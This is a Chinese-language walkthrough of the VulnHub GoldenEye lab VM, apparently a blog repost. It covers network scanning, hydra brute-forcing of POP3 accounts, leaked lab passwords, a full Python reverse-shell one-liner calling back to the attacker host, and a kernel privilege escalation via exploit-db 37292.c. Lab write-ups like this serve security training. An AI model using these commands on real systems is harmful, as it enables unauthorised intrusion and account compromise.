vulnhub之GoldenEye的实践

本周末实践的是vulnhub的GoldenEye镜像，下载地址，https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova，

这个渗透测试镜像也很有趣，一步一个线索，

先来个地址扫描，sudo netdiscover -r 192.168.137.0/24，

接着做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.137.47，

先访问一下http，http://192.168.137.47/，告诉你了一个路径线索，

那就接着访问这个路径，发现要用户名密码，

再回到根页面，查看源码，告诉你了个脚本文件线索，

那就继续访问这个脚本文件，这回告诉你了个账号线索，

密码是html编码的，随便找个解密网站搞一下，

这就得到了一对账号密码：boris/InvincibleHack3r，登录试试，

还是得查看源码，

别以为这个没啥用，其实有用，在提示另一个账号，没这个还真走不下去，

到这儿http这条线就先断了，接着走另外一条线，端口扫描不是扫出来两个不知道是啥服务的端口么，进一步详查一下，

sudo nmap -Pn -p 55006,55007 -sV 192.168.137.47，

得知是pop3，那可以继续找能登录的账户，

现在手里有个boris/InvincibleHack3r，登录一下，

sudo nc 192.168.137.47 55007，发现认证不过去，

那就说明登录pop3的密码是另外的，暴破它，sudo hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.137.47 -s 55007 pop3，

拿到了账号密码：boris/secret1!，就可以登录pop3试试了，

啥有用线索也没拿到，这时候想到http那条线最后提示的账号natalya，继续暴破，sudo hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.137.47 -s 55007 pop3，

拿到了账号密码：natalya/bird，再登录pop3，

这回拿到了另外一个账户线索，并给了登录站点，

按照提示，在本地hosts文件里加上域名地址记录，访问站点，

继续找线索，看到有一个未读消息，里面又提示了一个账号doak，

继续暴破，sudo hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.137.47 -s 55007 pop3，

拿到了账号密码：doak/goat，再登录pop3，

哈哈，又提示了一个账户线索，dr_doak/4England!，登录站点，

发现了一个文本文件，

下载下来看看内容，

根据提示admin的密码藏在一张照片里，打开看看，

没啥有用的信息，那就下载下来看看属性，

拿到了意思base64编码过的密码，随便找个解密网站搞一下，

这就拿到了账号密码：admin/xWinter1995x!，登录进站点，

接下来就是想办法反弹shell出来了，首先写一段脚本，

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.45",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

把脚本放到这里，

然后要改环境配置，

在外面开个监听，nc -lnvp 4444，然后在这里触发，

shell就过来了，id看一下不是root，需要提权，

看一下内核版本，然后搜一下这个内核版本有没有提权方法，

有一个c文件可用，

拷贝到本地，cp /usr/share/exploitdb/exploits/linux/local/37292.c ./

在靶机里确认一下编译环境的支持，不支持gcc，

那就得把c文件里编译命令改一下，vim 37292.c，

然后开个http文件下载服务，python -m SimpleHTTPServer，

在靶机里下载这个c文件，

编译可执行文件，cc 37292.c -o exp，

执行，拿到root权限，

本文始发于微信公众号（云计算和网络安全技术实践）：vulnhub之GoldenEye的实践